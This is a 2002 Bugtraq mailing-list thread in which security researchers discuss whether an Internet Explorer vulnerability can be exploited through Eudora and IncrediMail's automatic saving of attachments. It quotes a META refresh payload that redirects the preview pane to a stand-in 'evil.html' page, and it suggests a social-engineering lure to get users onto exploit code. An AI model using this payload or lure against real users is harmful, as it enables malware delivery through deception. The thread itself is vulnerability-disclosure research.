I just downloaded and installed Eudora 5.1 from the vendors site and tested. Eudora does indeed store any attachments in its "attach" directory, which in my case was "C:\Program Files\Qualcomm\Eudora\attach". This happened at the moment of arrival, before I even opened the email. However, Eudora is not directly subject to this exploit - all <OBJECT> and <SCRIPT> tags are automatically filtered out before rendering the HTML email. Furthermore, the default install of Eudora seems to run with any scripting disabled in its HTML rendering. So far this is very promising and a nice touch by Qualcomm, and does indeed eliminate the possibility of an automated attach-and-run virus. Even when embedding an automated refresh in the HTML that forces the preview pane to a new page ( e.g. <META HTTP-EQUIV="Refresh" CONTENT="1;URL=http://your.tld/evil.html";> ), Eudora will not execute any scripting or ActiveX in "evil.html". Still, all you need to do from here is a bit of social engineering ("Free porn that way! -->") to convince the user that he must click on the link to your site (containing the exploit code). When the user clicks a link in Eudora, it's opened in his browser instead of inside the preview pane, and the exploit code can then run automatically. Regards Thor Larholm Jubii A/S - Internet Programmer -----Original Message----- From: RT [mailto:roelof@sensepost.com] Sent: 16. marts 2002 01:59 To: Thor Larholm Cc: 'Eric Detoisien'; bugtraq@securityfocus.com Subject: RE: MSIE vulnerability exploitable with IncrediMail Immm... Eudora Mail .. automatically saves attachments in <drive>:\program files\qualcomm\eudora\attachments .. right? The (very old) version (4.1) that I have sure does that. And even if you delete the email itself (after opening), or right click on the file and selecting delete - the file stays. So, you just need to get the file in there and have the user visit a corrupted web .. and hey.. presto! Just my 2c on this, Roelof. On Fri, 15 Mar 2002, Thor Larholm wrote: +Isn't {42D00B20-479C-11d4-9706-00105A40931C} a GUID for your user account, +and as such unknown from time to time, making the proposed exploit +unfeasable ? + + +Regards +Thor Larholm +Jubii A/S - Internet Programmer + + ------------------------------------------------------ Roelof W Temmingh SensePost IT security roelof@sensepost.com +27 83 448 6996 http://www.sensepost.com http://www.hackrack.com
